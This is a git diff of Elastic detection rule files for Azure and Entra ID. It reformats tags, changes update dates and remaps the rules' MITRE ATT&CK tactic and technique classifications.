= "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -94,25 +106,42 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index 829a5c592d2..222286c88de 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "df26fd74-1baa-4479-b42e-48da84642330" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,13 +73,26 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/persistence_automation_webhook_created.toml b/rules/integrations/azure/persistence_automation_webhook_created.toml index e92f77af499..8329792a513 100644 --- a/rules/integrations/azure/persistence_automation_webhook_created.toml +++ b/rules/integrations/azure/persistence_automation_webhook_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -79,7 +79,6 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -89,3 +88,15 @@ reference = "https://attack.mitre.org/techniques/T1546/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1608" +name = "Stage Capabilities" +reference = "https://attack.mitre.org/techniques/T1608/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml index 91602b230ea..a89c1fcdf5d 100644 --- a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -70,7 +70,16 @@ references = [ risk_score = 47 rule_id = "bc48bba7-4a23-4232-b551-eca3ca1e3f20" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Use Case: Configuration Audit", + "Tactic: Persistence", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "new_terms" @@ -83,7 +92,6 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" @@ -94,28 +102,12 @@ id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.009" -name = "Conditional Access Policies" -reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml index 2c0d8ed1c85..94d21dfa04f 100644 --- a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml +++ b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -60,7 +60,16 @@ references = [ risk_score = 73 rule_id = "04c5a96f-19c5-44fd-9571-a0b033f9086f" severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "query" @@ -74,36 +83,19 @@ event.dataset:azure.auditlogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml index 38ea5fab7ad..5729fb8abc7 100644 --- a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml +++ b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/08" [rule] author = ["Elastic"] @@ -62,7 +62,16 @@ This rule identifies the deactivation of MFA for an Entra ID user account. This risk_score = 47 rule_id = "dafa3235-76dc-40e2-9f71-1773b96d24cf" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -77,36 +86,19 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml index 4cd9743fae9..67622baed76 100644 --- a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml +++ b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -69,7 +69,7 @@ references = [ risk_score = 73 rule_id = "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8" severity = "high" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,36 +84,18 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml index 68e733f883d..421b38cec2b 100644 --- a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -68,7 +68,13 @@ references = [ risk_score = 47 rule_id = "7882cebf-6cf1-4de3-9662-213aa13e8b80" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -79,26 +85,30 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml index 72b956b54e5..b1eac4dbf32 100644 --- a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml +++ b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/15" [rule] author = ["Elastic"] @@ -52,7 +52,17 @@ references = [ risk_score = 47 rule_id = "40e60816-5122-11f0-9caa-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Use Case: Threat Detection", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Tactic: Persistence", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -100,28 +110,48 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml index 99fc3c11e04..39ea903de00 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic", "Austin Songer"] @@ -60,7 +60,15 @@ references = [ risk_score = 47 rule_id = "f766ffaf-9568-4909-b734-75d19b35cbf4" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -73,7 +81,6 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -84,28 +91,13 @@ id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml index aa8729363c5..fd409ec66bb 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "Changes in ECS added cloud.* fields which are not available prior to ^9.2.0" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] @@ -61,7 +61,17 @@ setup = """### Microsft Entra ID Audit Logs This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs). """ severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -81,18 +91,36 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml index d988f949290..2ca71e31d2f 100644 --- a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml +++ b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -71,7 +71,17 @@ setup = """### Microsoft Entra ID Audit Logs This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs). """ severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -85,44 +95,33 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml index b0cd7cfb345..0491e8e6a55 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -57,7 +57,7 @@ The Azure Fleet integration, Filebeat module, or similarly structured data is re risk_score = 21 rule_id = "774f5e28-7b75-4a58-b94e-41bf060fdd86" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -68,26 +68,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml index 38a064cdfed..0d51d53cae8 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "38e5acdd-5f20-4d99-8fe4-f0a1a592077f" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,36 +73,23 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml index 431d0f19a4c..ab26fc86d1c 100644 --- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml +++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -58,7 +58,16 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "low" -tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-in Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -75,39 +84,39 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] 